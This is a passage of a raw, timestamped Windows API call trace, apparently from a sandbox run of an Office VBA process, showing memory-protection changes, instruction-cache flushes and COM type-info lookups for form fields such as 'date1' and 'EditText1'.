lpBaseAddress=0x6cac6c0, dwSize=0x2) returned 1 [0042.036] GetCurrentProcess () returned 0xffffffffffffffff [0042.036] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cac714, dwSize=0x45) returned 1 [0042.036] VirtualProtect (in: lpAddress=0x6cac714, dwSize=0x48, flNewProtect=0x40, lpflOldProtect=0x18348c | out: lpflOldProtect=0x18348c*=0x40) returned 1 [0042.037] GetCurrentProcess () returned 0xffffffffffffffff [0042.037] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cac79c, dwSize=0x45) returned 1 [0042.037] VirtualProtect (in: lpAddress=0x6cac79c, dwSize=0x48, flNewProtect=0x40, lpflOldProtect=0x18348c | out: lpflOldProtect=0x18348c*=0x40) returned 1 [0042.037] GetCurrentProcess () returned 0xffffffffffffffff [0042.037] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cac819, dwSize=0x8) returned 1 [0042.037] GetCurrentProcess () returned 0xffffffffffffffff [0042.037] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cac818, dwSize=0x8) returned 1 [0042.037] GetCurrentProcess () returned 0xffffffffffffffff [0042.037] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cac828, dwSize=0x2) returned 1 [0042.037] GetCurrentProcess () returned 0xffffffffffffffff [0042.037] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cac90c, dwSize=0x45) returned 1 [0042.037] VirtualProtect (in: lpAddress=0x6cac90c, dwSize=0x48, flNewProtect=0x40, lpflOldProtect=0x18348c | out: lpflOldProtect=0x18348c*=0x40) returned 1 [0042.037] GetCurrentProcess () returned 0xffffffffffffffff [0042.037] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cac994, dwSize=0x45) returned 1 [0042.037] VirtualProtect (in: lpAddress=0x6cac994, dwSize=0x48, flNewProtect=0x40, lpflOldProtect=0x18348c | out: lpflOldProtect=0x18348c*=0x40) returned 1 [0042.037] GetCurrentProcess () returned 0xffffffffffffffff [0042.037] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6caca11, dwSize=0x8) returned 1 [0042.037] GetCurrentProcess () returned 0xffffffffffffffff [0042.037] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6caca10, dwSize=0x8) returned 1 [0042.037] GetCurrentProcess () returned 0xffffffffffffffff [0042.037] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6caca20, dwSize=0x2) returned 1 [0042.037] GetCurrentProcess () returned 0xffffffffffffffff [0042.037] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6caca74, dwSize=0x45) returned 1 [0042.037] VirtualProtect (in: lpAddress=0x6caca74, dwSize=0x48, flNewProtect=0x40, lpflOldProtect=0x18348c | out: lpflOldProtect=0x18348c*=0x40) returned 1 [0042.037] GetCurrentProcess () returned 0xffffffffffffffff [0042.037] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cacb5c, dwSize=0x45) returned 1 [0042.037] VirtualProtect (in: lpAddress=0x6cacb5c, dwSize=0x48, flNewProtect=0x40, lpflOldProtect=0x18348c | out: lpflOldProtect=0x18348c*=0x40) returned 1 [0042.037] GetCurrentProcess () returned 0xffffffffffffffff [0042.037] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cacbd9, dwSize=0x8) returned 1 [0042.037] GetCurrentProcess () returned 0xffffffffffffffff [0042.037] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cacbd8, dwSize=0x8) returned 1 [0042.037] GetCurrentProcess () returned 0xffffffffffffffff [0042.037] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cacbe8, dwSize=0x2) returned 1 [0042.037] GetCurrentProcess () returned 0xffffffffffffffff [0042.037] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cacc3c, dwSize=0x45) returned 1 [0042.037] VirtualProtect (in: lpAddress=0x6cacc3c, dwSize=0x48, flNewProtect=0x40, lpflOldProtect=0x18348c | out: lpflOldProtect=0x18348c*=0x40) returned 1 [0042.038] GetCurrentProcess () returned 0xffffffffffffffff [0042.038] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6caccc4, dwSize=0x45) returned 1 [0042.038] VirtualProtect (in: lpAddress=0x6caccc4, dwSize=0x48, flNewProtect=0x40, lpflOldProtect=0x18348c | out: lpflOldProtect=0x18348c*=0x40) returned 1 [0042.038] GetCurrentProcess () returned 0xffffffffffffffff [0042.038] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cacdac, dwSize=0x4c) returned 1 [0042.038] RtlLookupFunctionEntry (in: ControlPc=0x6cacdac, ImageBase=0x183378, HistoryTable=0x183380 | out: ImageBase=0x183378, HistoryTable=0x183380) returned 0x6cace08 [0042.038] GetCurrentProcess () returned 0xffffffffffffffff [0042.038] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cace64, dwSize=0x4c) returned 1 [0042.038] RtlLookupFunctionEntry (in: ControlPc=0x6cace64, ImageBase=0x183378, HistoryTable=0x183380 | out: ImageBase=0x183378, HistoryTable=0x183380) returned 0x6cacec0 [0042.038] IUnknown:AddRef (This=0x6a6e948) returned 0x7 [0042.038] IUnknown:QueryInterface (in: This=0x6a6e948, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x184848 | out: ppvObject=0x184848*=0x0) returned 0x80004002 [0042.038] IUnknown:QueryInterface (in: This=0x6a6e948, riid=0x7fee45e0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x184840 | out: ppvObject=0x184840*=0x0) returned 0x80004002 [0042.038] IUnknown:Release (This=0x6a6e948) returned 0x6 [0042.038] IUnknown:AddRef (This=0x6ccf078) returned 0x4 [0042.038] IUnknown:QueryInterface (in: This=0x6ccf078, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x184848 | out: ppvObject=0x184848*=0x0) returned 0x80004002 [0042.038] IUnknown:QueryInterface (in: This=0x6ccf078, riid=0x7fee45e0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x184840 | out: ppvObject=0x184840*=0x0) returned 0x80004002 [0042.038] IUnknown:Release (This=0x6ccf078) returned 0x3 [0042.038] IUnknown:AddRef (This=0x6a6e9a8) returned 0x2 [0042.038] IUnknown:QueryInterface (in: This=0x6a6e9a8, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x184848 | out: ppvObject=0x184848*=0x0) returned 0x80004002 [0042.038] IUnknown:QueryInterface (in: This=0x6a6e9a8, riid=0x7fee45e0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x184840 | out: ppvObject=0x184840*=0x0) returned 0x80004002 [0042.038] IUnknown:Release (This=0x6a6e9a8) returned 0x1 [0042.038] IUnknown:AddRef (This=0x6a6e8e8) returned 0x7 [0042.038] IUnknown:QueryInterface (in: This=0x6a6e8e8, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x184848 | out: ppvObject=0x184848*=0x0) returned 0x80004002 [0042.038] IUnknown:QueryInterface (in: This=0x6a6e8e8, riid=0x7fee45e0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x184840 | out: ppvObject=0x184840*=0x0) returned 0x80004002 [0042.038] IUnknown:Release (This=0x6a6e8e8) returned 0x6 [0042.038] IUnknown:AddRef (This=0x6ceee08) returned 0x5 [0042.038] IUnknown:QueryInterface (in: This=0x6ceee08, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x184848 | out: ppvObject=0x184848*=0x0) returned 0x80004002 [0042.038] IUnknown:QueryInterface (in: This=0x6ceee08, riid=0x7fee45e0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x184840 | out: ppvObject=0x184840*=0x0) returned 0x80004002 [0042.038] IUnknown:Release (This=0x6ceee08) returned 0x4 [0042.038] IUnknown:AddRef (This=0x6ceeeb8) returned 0x6 [0042.038] IUnknown:QueryInterface (in: This=0x6ceeeb8, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x184848 | out: ppvObject=0x184848*=0x0) returned 0x80004002 [0042.038] IUnknown:QueryInterface (in: This=0x6ceeeb8, riid=0x7fee45e0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x184840 | out: ppvObject=0x184840*=0x0) returned 0x80004002 [0042.038] IUnknown:Release (This=0x6ceeeb8) returned 0x5 [0042.039] VarAdd (in: pvarLeft=0x6b7ed40, pvarRight=0x6b7ed58, pvarResult=0x6b7ed28 | out: pvarResult=0x6b7ed28) returned 0x0 [0042.039] IUnknown:Release (This=0x6a6e8e8) returned 0x7 [0042.040] IUnknown:Release (This=0x6a6e948) returned 0x6 [0042.040] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x505038e, cbMultiByte=6, lpWideCharStr=0x182ff0, cchWideChar=7 | out: lpWideCharStr="date1") returned 6 [0042.040] ITypeComp:RemoteBind (in: This=0x6a6e8f0, szName="date1", lHashVal=0x1031d4, wFlags=0x3, ppTInfo=0x182fa8, pDescKind=0x182fbc, ppFuncDesc=0x182fc0, ppVarDesc=0x7feffd8c15f, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x182fa8*=0x6a6e8e8, pDescKind=0x182fbc*=1, ppFuncDesc=0x182fc0, ppVarDesc=0x7feffd8c15f, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0042.040] ITypeInfo:RemoteGetTypeAttr (in: This=0x6a6e8e8, ppTypeAttr=0x182fb0, pDummy=0x1 | out: ppTypeAttr=0x182fb0, pDummy=0x1) returned 0x0 [0042.040] ITypeInfo:LocalReleaseTypeAttr (This=0x6a6e8e8) returned 0x0 [0042.040] ITypeInfo:GetRefTypeInfo (in: This=0x6a6e8e8, hreftype=0x25, ppTInfo=0x182868 | out: ppTInfo=0x182868*=0x6ceee08) returned 0x0 [0042.040] IUnknown:QueryInterface (in: This=0x6ceee08, riid=0x7fee45e0b88*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x182a38 | out: ppvObject=0x182a38*=0x0) returned 0x80004002 [0042.040] ITypeInfo:RemoteGetTypeAttr (in: This=0x6ceee08, ppTypeAttr=0x1828b8, pDummy=0x10 | out: ppTypeAttr=0x1828b8, pDummy=0x10) returned 0x0 [0042.040] ITypeInfo:LocalReleaseTypeAttr (This=0x6ceee08) returned 0x0 [0042.040] IUnknown:Release (This=0x6ceee08) returned 0x4 [0042.040] ITypeInfo:RemoteGetTypeAttr (in: This=0x6a6e8e8, ppTypeAttr=0x182d60, pDummy=0x0 | out: ppTypeAttr=0x182d60, pDummy=0x0) returned 0x0 [0042.040] ITypeInfo:LocalReleaseTypeAttr (This=0x6a6e8e8) returned 0x0 [0042.040] IUnknown:QueryInterface (in: This=0x6a6e8e8, riid=0x7fee45d40f0*(Data1=0x20412, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x182e10 | out: ppvObject=0x182e10*=0x6a6e8e8) returned 0x0 [0042.040] ITypeInfo2:GetFuncIndexOfMemId (in: This=0x6a6e8e8, memid=2008, invkind=2, pFuncIndex=0x182e50 | out: pFuncIndex=0x182e50*=0x4) returned 0x0 [0042.040] ITypeInfo2:GetFuncCustData (in: This=0x6a6e8e8, index=0x4, GUID=0x7fee45e3758*(Data1=0x50867b00, Data2=0xbb69, Data3=0x11d0, Data4=([0]=0xa8, [1]=0xff, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x11, [6]=0x0, [7]=0x59)), pVarVal=0x182e68 | out: pVarVal=0x182e68*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x182f10, varVal2=0x6b7ed20)) returned 0x0 [0042.040] IUnknown:Release (This=0x6a6e8e8) returned 0x7 [0042.040] IUnknown:QueryInterface (in: This=0x6ceee08, riid=0x7fee45e0b88*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x182dc8 | out: ppvObject=0x182dc8*=0x0) returned 0x80004002 [0042.040] IUnknown:QueryInterface (in: This=0x6ceee08, riid=0x7fee45e2aa8*(Data1=0xcacc1e89, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x182ca0 | out: ppvObject=0x182ca0*=0x0) returned 0x80004002 [0042.040] IUnknown:Release (This=0x6ceee08) returned 0x4 [0042.040] IUnknown:QueryInterface (in: This=0x6ceee08, riid=0x7fee45e0b88*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x182dc8 | out: ppvObject=0x182dc8*=0x0) returned 0x80004002 [0042.040] IUnknown:QueryInterface (in: This=0x6ceee08, riid=0x7fee45e2aa8*(Data1=0xcacc1e89, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x182ca0 | out: ppvObject=0x182ca0*=0x0) returned 0x80004002 [0042.040] IUnknown:Release (This=0x6ceee08) returned 0x4 [0042.040] IUnknown:AddRef (This=0x6a6e8e8) returned 0x8 [0042.040] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e8e8) returned 0x0 [0042.040] IUnknown:Release (This=0x6a6e8e8) returned 0x7 [0042.041] IUnknown:QueryInterface (in: This=0x6a6e8e8, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x183128 | out: ppvObject=0x183128*=0x0) returned 0x80004002 [0042.041] IUnknown:AddRef (This=0x6a6e8e8) returned 0x8 [0042.041] IUnknown:Release (This=0x6a6e8e8) returned 0x7 [0042.041] IUnknown:QueryInterface (in: This=0x6a6e8e8, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x183288 | out: ppvObject=0x183288*=0x0) returned 0x80004002 [0042.041] IUnknown:QueryInterface (in: This=0x6a6e8e8, riid=0x7fee45e0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x183280 | out: ppvObject=0x183280*=0x0) returned 0x80004002 [0042.041] ITypeInfo:RemoteGetTypeAttr (in: This=0x6a6e8e8, ppTypeAttr=0x1834d8, pDummy=0x0 | out: ppTypeAttr=0x1834d8, pDummy=0x0) returned 0x0 [0042.041] ITypeInfo:LocalReleaseTypeAttr (This=0x6a6e8e8) returned 0x0 [0042.041] IUnknown:Release (This=0x6a6e8e8) returned 0x7 [0042.041] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cc0790, dwSize=0x4c) returned 1 [0042.041] IMalloc:Free (This=0x7feffc15380, pv=0x6cc0790) [0042.041] ITypeInfo:RemoteGetTypeAttr (in: This=0x6a6e8e8, ppTypeAttr=0x182a70, pDummy=0x0 | out: ppTypeAttr=0x182a70, pDummy=0x0) returned 0x0 [0042.041] ITypeInfo:LocalReleaseTypeAttr (This=0x6a6e8e8) returned 0x0 [0042.041] IMalloc:Realloc (This=0x7feffc15380, pv=0x66e9c80, cb=0x1000) returned 0x6858470 [0042.041] IUnknown:Release (This=0x6a6e8e8) returned 0x8 [0042.041] IUnknown:Release (This=0x6a6e948) returned 0x7 [0042.041] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x50503b6, cbMultiByte=10, lpWideCharStr=0x182ff0, cchWideChar=11 | out: lpWideCharStr="EditText1") returned 10 [0042.041] ITypeComp:RemoteBind (in: This=0x6a6e8f0, szName="EditText1", lHashVal=0x1097ee, wFlags=0x5, ppTInfo=0x182fa8, pDescKind=0x182fbc, ppFuncDesc=0x182fc0, ppVarDesc=0x7feffd8c15f, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x182fa8*=0x0, pDescKind=0x182fbc*=0, ppFuncDesc=0x182fc0, ppVarDesc=0x7feffd8c15f, ppTypeComp=0x0, pDummy=0x0) returned 0x80028ca0 [0042.041] IUnknown:Release (This=0x6a6e8e8) returned 0x8 [0042.041] IUnknown:Release (This=0x6a6e948) returned 0x7 [0042.041] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x50503b6, cbMultiByte=10, lpWideCharStr=0x182cf0, cchWideChar=11 | out: lpWideCharStr="EditText1") returned 10 [0042.041] ITypeComp:RemoteBind (in: This=0x6a6e8f0, szName="EditText1", lHashVal=0x1097ee, wFlags=0x3, ppTInfo=0x182ca8, pDescKind=0x182cbc, ppFuncDesc=0x182cc0, ppVarDesc=0x7feffd8c15f, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x182ca8*=0x6a6e8e8, pDescKind=0x182cbc*=1, ppFuncDesc=0x182cc0, ppVarDesc=0x7feffd8c15f, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0042.041] ITypeInfo:RemoteGetTypeAttr (in: This=0x6a6e8e8, ppTypeAttr=0x182cb0, pDummy=0x1 | out: ppTypeAttr=0x182cb0, pDummy=0x1) returned 0x0 [0042.041] ITypeInfo:LocalReleaseTypeAttr (This=0x6a6e8e8) returned 0x0 [0042.041] ITypeInfo:GetRefTypeInfo (in: This=0x6a6e8e8, hreftype=0x25, ppTInfo=0x182568 | out: ppTInfo=0x182568*=0x6ceee08) returned 0x0 [0042.042] IUnknown:QueryInterface (in: This=0x6ceee08, riid=0x7fee45e0b88*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x182738 | out: ppvObject=0x182738*=0x0) returned 0x80004002 [0042.042] ITypeInfo:RemoteGetTypeAttr (in: This=0x6ceee08, ppTypeAttr=0x1825b8, pDummy=0x10 | out: ppTypeAttr=0x1825b8, pDummy=0x10) returned 0x0 [0042.042] ITypeInfo:LocalReleaseTypeAttr (This=0x6ceee08) returned 0x0 [0042.042] IUnknown:Release (This=0x6ceee08) returned 0x4 [0042.042] ITypeInfo:RemoteGetTypeAttr (in: This=0x6a6e8e8, ppTypeAttr=0x182a60, pDummy=0x0 | out: ppTypeAttr=0x182a60, pDummy=0x0) returned 0x0 [0042.042] ITypeInfo:LocalReleaseTypeAttr (This=0x6a6e8e8) returned 0x0 [0042.042] IMalloc:Realloc (This=0x7feffc15380, pv=0x6d087f0, cb=0x800) returned 0x66e9c80 [0042.042] IUnknown:QueryInterface (in: This=0x6a6e8e8, riid=0x7fee45d40f0*(Data1=0x20412, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x182b10 | out: ppvObject=0x182b10*=0x6a6e8e8) returned 0x0 [0042.042] ITypeInfo2:GetFuncIndexOfMemId (in: This=0x6a6e8e8, memid=2004, invkind=2, pFuncIndex=0x182b50 | out: pFuncIndex=0x182b50*=0x2) returned 0x0 [0042.042] ITypeInfo2:GetFuncCustData (in: This=0x6a6e8e8, index=0x2, GUID=0x7fee45e3758*(Data1=0x50867b00, Data2=0xbb69, Data3=0x11d0, Data4=([0]=0xa8, [1]=0xff, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x11, [6]=0x0, [7]=0x59)), pVarVal=0x182b68 | out: pVarVal=0x182b68*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x182c10, varVal2=0x6b7ed20)) returned 0x0 [0042.042] IUnknown:Release (This=0x6a6e8e8) returned 0x8 [0042.042] IUnknown:QueryInterface (in: This=0x6ceee08, riid=0x7fee45e0b88*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x182ac8 | out: ppvObject=0x182ac8*=0x0) returned 0x80004002 [0042.042] IUnknown:QueryInterface (in: This=0x6ceee08, riid=0x7fee45e2aa8*(Data1=0xcacc1e89, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1829a0 | out: ppvObject=0x1829a0*=0x0) returned 0x80004002 [0042.042] IUnknown:Release (This=0x6ceee08) returned 0x4 [0042.042] IUnknown:QueryInterface (in: This=0x6ceee08, riid=0x7fee45e0b88*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x182ac8 | out: ppvObject=0x182ac8*=0x0) returned 0x80004002 [0042.042] IUnknown:QueryInterface (in: This=0x6ceee08, riid=0x7fee45e2aa8*(Data1=0xcacc1e89, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1829a0 | out: ppvObject=0x1829a0*=0x0) returned 0x80004002 [0042.042] IUnknown:Release (This=0x6ceee08) returned 0x4 [0042.042] IUnknown:AddRef (This=0x6a6e8e8) returned 0x9 [0042.042] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e8e8) returned 0x0 [0042.042] IUnknown:Release (This=0x6a6e8e8) returned 0x8 [0042.042] IUnknown:QueryInterface (in: This=0x6a6e8e8, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x182e28 | out: ppvObject=0x182e28*=0x0) returned 0x80004002 [0042.042] IUnknown:AddRef (This=0x6a6e8e8) returned 0x9 [0042.042] IUnknown:Release (This=0x6a6e8e8) returned 0x8 [0042.042] IUnknown:QueryInterface (in: This=0x6a6e8e8, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x182f88 | out: ppvObject=0x182f88*=0x0) returned 0x80004002 [0042.042] IUnknown:QueryInterface (in: This=0x6a6e8e8, riid=0x7fee45e0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x182f80 | out: ppvObject=0x182f80*=0x0) returned 0x80004002 [0042.042] ITypeInfo:RemoteGetTypeAttr (in: This=0x6a6e8e8, ppTypeAttr=0x183408, pDummy=0x0 | out: ppTypeAttr=0x183408, pDummy=0x0) returned 0x0 [0042.042] ITypeInfo:LocalReleaseTypeAttr (This=0x6a6e8e8) returned 0x0 [0042.042] IUnknown:Release (This=0x6a6e8e8) returned 0x8 [0042.042] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cc0790, dwSize=0x4c) returned 1 [0042.042] IMalloc:Free (This=0x7feffc15380, pv=0x6cc0790) [0042.042] ITypeInfo:RemoteGetTypeAttr (in: This=0x6a6e8e8, ppTypeAttr=0x1829a0, pDummy=0x0 | out: ppTypeAttr=0x1829a0, pDummy=0x0) returned 0x0 [0042.042] ITypeInfo:LocalReleaseTypeAttr (This=0x6a6e8e8) returned 0x0 [0042.043] IUnknown:Release (This=0x6ceeeb8) returned 0x5 [0042.043] IUnknown:Release (This=0x6ceee08) returned 0x4 [0042.043] IUnknown:QueryInterface (in: This=0x6ceeeb8, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x182f18 | out: ppvObject=0x182f18*=0x0) returned 0x80004002 [0042.043] IUnknown:AddRef (This=0x6ceeeb8) returned 0x7 [0042.043] ITypeInfo:RemoteGetTypeAttr (in: This=0x6ceeeb8, ppTypeAttr=0x182f10, pDummy=0x10 | out: ppTypeAttr=0x182f10, pDummy=0x10) returned 0x0 [0042.043] ITypeInfo:LocalReleaseTypeAttr (This=0x6ceeeb8) returned 0x0 [0042.043] ITypeInfo:GetRefTypeOfImplType (in: This=0x6ceeeb8, index=0x0, pRefType=0x182f08 | out: pRefType=0x182f08*=0x1302) returned 0x0 [0042.043] ITypeInfo:GetRefTypeInfo (in: This=0x6ceeeb8, hreftype=0x1302, ppTInfo=0x182f20 | out: ppTInfo=0x182f20*=0x6ceef68) returned 0x0 [0042.043] IUnknown:Release (This=0x6ceeeb8) returned 0x6 [0042.043] ITypeInfo:RemoteGetTypeAttr (in: This=0x6ceef68, ppTypeAttr=0x182f10, pDummy=0x182ef0 | out: ppTypeAttr=0x182f10, pDummy=0x182ef0*=0x182f30) returned 0x0 [0042.043] ITypeInfo:LocalReleaseTypeAttr (This=0x6ceef68) returned 0x0 [0042.043] ITypeInfo:GetRefTypeOfImplType (in: This=0x6ceef68, index=0x0, pRefType=0x182f08 | out: pRefType=0x182f08*=0xf) returned 0x0 [0042.043] ITypeInfo:GetRefTypeInfo (in: This=0x6ceef68, hreftype=0xf, ppTInfo=0x182f20 | out: ppTInfo=0x182f20*=0x6bbd1c8) returned 0x0 [0042.043] IUnknown:Release (This=0x6ceef68) returned 0x0 [0042.043] ITypeInfo:RemoteGetTypeAttr (in: This=0x6bbd1c8, ppTypeAttr=0x182f10, pDummy=0x182ee8 | out: ppTypeAttr=0x182f10, pDummy=0x182ee8*=0xf) returned 0x0 [0042.043] ITypeInfo:LocalReleaseTypeAttr (This=0x6bbd1c8) returned 0x0 [0042.043] IUnknown:Release (This=0x6bbd1c8) returned 0x4 [0042.043] ITypeInfo:RemoteGetDocumentation (in: This=0x6ceeeb8, memid=0, refPtrFlags=0x182f90, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x6bd3160 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, 